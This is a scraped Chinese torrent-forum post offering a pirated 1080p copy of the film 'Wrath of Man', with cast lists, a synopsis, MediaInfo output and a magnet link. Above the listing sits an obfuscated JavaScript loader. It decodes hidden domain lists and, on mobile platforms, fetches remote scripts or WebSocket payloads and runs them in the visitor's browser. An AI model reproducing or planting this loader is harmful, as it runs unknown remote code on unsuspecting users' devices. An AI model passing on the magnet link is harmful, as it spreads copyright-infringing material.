人之怒[国英多音轨].Wrath.of.Man.2021.1080p.WEB-DL.H264.DDP5.1.2Audio 16.23GB

版主小s 1月前 257

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 人之怒 / 玩命钞劫(台) / 运钞车 / Cash Truck
◎片  名 Wrath of Man
◎年  代 2021
◎产  地 美国 / 英国
◎类  别 动作 / 犯罪
◎语  言 英语
◎上映日期 2021-05-10(中国大陆) / 2021-04-22(俄罗斯) / 2021-05-07(美国)
◎IMDb链接 https://www.imdb.com/title/tt11083552/
◎豆瓣评分 6.8/10 (89949人评价)
◎豆瓣链接 https://movie.douban.com/subject/27046740/
◎片  长 118分钟
◎导  演 盖·里奇 Guy Ritchie (id:1025148)
◎编  剧 尼古拉斯·布赫里夫 Nicolas Boukhrief (id:1019943)
       艾瑞克·贝斯纳 éric Besnard (id:1033108)
       盖·里奇 Guy Ritchie (id:1025148)
       马恩·戴维斯 Marn Davies (id:1405637)
       伊凡·阿特金森 Ivan Atkinson (id:1405636)
◎演  员 杰森·斯坦森 Jason Statham (id:1049484)
       霍特·麦克卡兰尼 Holt McCallany (id:1118033)
       罗奇·威廉姆斯 Rocci Williams (id:1456269)
       乔什·哈奈特 Josh Hartnett (id:1025145)
       杰弗里·多诺万 Jeffrey Donovan (id:1044732)
       斯科特·伊斯特伍德 Scott Eastwood (id:1000188)
       安迪·加西亚 Andy Garcia (id:1002695)
       道比·欧帕瑞 Deobia Oparei (id:1326517)
       拉兹·阿隆索 Laz Alonso (id:1277094)
       劳尔·卡斯提洛 Raúl Castillo (id:1338121)
       克里斯·雷利 Chris Reilly (id:1352289)
       埃迪·马森 Eddie Marsan (id:1291072)
       尼芙·阿尔格 Niamh Algar (id:1410386)
       塔格·墨菲 Tadhg Murphy (id:1308673)
       马克·阿诺德 Mark Arnold (id:1057556)
       亚历克斯·费恩斯 Alex Ferns (id:1028439)
       乔什·柯德雷 Josh Cowdery (id:1450335)
       杰森·王 Jason Wong (id:1260279)
       罗伯·德兰尼 Rob Delaney (id:1268159)
       伊莱·布朗 Eli Brown (id:1413892)
       凯瑞·莎勒 Kerry Shale (id:1322372)
       卡梅伦·杰克 Cameron Jack (id:1368839)
       达雷尔·席尔瓦 Darrell D'Silva (id:1438597)
       巴布斯·奥卢桑莫昆 Babs Olusanmokun (id:1412919)
       多米尼克·托马斯 Dominique Thomas (id:1375866)
       琳·勒内 Lyne Renee (id:1217150)
       蕾贝卡·卡尔德 Rebecca Calder (id:1423736)
       伊芙·麦凯林 Eve Macklin (id:1345477)
       詹姆斯·沃伦 James Warren (id:1357923)
       史蒂威·戴维斯 Stevee Davies (id:1263226)
       蒙塔娜·曼宁 Montana Manning (id:1415104)
       安东尼·莫利纳利 Anthony Molinari (id:1045545)
       波兹·马龙 Post Malone (id:1432820)
         (id:1454486)
       杰拉尔德·泰勒 Gerald Tyler (id:1457718)
       艾伦·斯图尔特 Alan Stewart (id:1051226)

◎标  签 犯罪 / 动作 / 美国 / 2021 / 剧情 / 悬疑 / 英国 / 黑色幽默

◎简  介
  在一次全副武装的运钞车劫案中,梅斯先生(杰森·斯坦森 饰)的儿子作为案发目击者被劫匪杀害。怒火中烧的梅斯为报丧子之仇,化身H卧底成为运钞车安保,试图找出杀害他儿子的劫匪以及与劫匪暗中勾结的安保公司内鬼。

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 307842416327350256850648918662068415172 (0xE7984AF359C5C0E73C8598E0A4BDAAC4)
  4. Complete name                            : 人之怒[email protected]COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 16.2 GiB
  8. Duration                                 : 1 h 54 min
  9. Overall bit rate                         : 20.2 Mb/s
  10. Encoded date                             : UTC 2021-08-04 08:14:24
  11. Writing application                      : mkvmerge v51.0.0 ('I Wish') 64-bit
  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.2
  13. Video
  14. ID                                       : 1
  15. Format                                   : AVC
  16. Format/Info                              : Advanced Video Codec
  17. Format profile                           : [email protected]
  18. Format settings                          : CABAC / 1 Ref Frames
  19. Format settings, CABAC                   : Yes
  20. Format settings, Reference frames        : 1 frame
  21. Format settings, GOP                     : M=1, N=30
  22. Codec ID                                 : V_MPEG4/ISO/AVC
  23. Duration                                 : 1 h 54 min
  24. Bit rate                                 : 19.7 Mb/s
  25. Width                                    : 1 920 pixels
  26. Height                                   : 812 pixels
  27. Display aspect ratio                     : 2.35:1
  28. Frame rate mode                          : Constant
  29. Frame rate                               : 24.000 FPS
  30. Color space                              : YUV
  31. Chroma subsampling                       : 4:2:0
  32. Bit depth                                : 8 bits
  33. Scan type                                : Progressive
  34. Bits/(Pixel*Frame)                       : 0.527
  35. Stream size                              : 15.8 GiB (97%)
  36. Language                                 : English
  37. Default                                  : Yes
  38. Forced                                   : No
  39. Audio #1
  40. ID                                       : 2
  41. Format                                   : E-AC-3
  42. Format/Info                              : Enhanced AC-3
  43. Commercial name                          : Dolby Digital Plus
  44. Codec ID                                 : A_EAC3
  45. Duration                                 : 1 h 54 min
  46. Bit rate mode                            : Constant
  47. Bit rate                                 : 256 kb/s
  48. Channel(s)                               : 6 channels
  49. Channel layout                           : L R C LFE Ls Rs
  50. Sampling rate                            : 48.0 kHz
  51. Frame rate                               : 31.250 FPS (1536 SPF)
  52. Compression mode                         : Lossy
  53. Delay relative to video                  : 24 ms
  54. Stream size                              : 210 MiB (1%)
  55. Title                                    : 英语
  56. Language                                 : English
  57. Service kind                             : Complete Main
  58. Default                                  : Yes
  59. Forced                                   : No
  60. Audio #2
  61. ID                                       : 3
  62. Format                                   : E-AC-3
  63. Format/Info                              : Enhanced AC-3
  64. Commercial name                          : Dolby Digital Plus
  65. Codec ID                                 : A_EAC3
  66. Duration                                 : 1 h 54 min
  67. Bit rate mode                            : Constant
  68. Bit rate                                 : 256 kb/s
  69. Channel(s)                               : 6 channels
  70. Channel layout                           : L R C LFE Ls Rs
  71. Sampling rate                            : 48.0 kHz
  72. Frame rate                               : 31.250 FPS (1536 SPF)
  73. Compression mode                         : Lossy
  74. Delay relative to video                  : 24 ms
  75. Stream size                              : 210 MiB (1%)
  76. Title                                    : 国语
  77. Language                                 : Chinese
  78. Service kind                             : Complete Main
  79. Default                                  : No
  80. Forced                                   : No


TAGS 动作 犯罪

磁力链:
  • magnet:?xt=urn:btih:64B57420BAD2D35710B4F61AED26CEE40B7D9B00
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回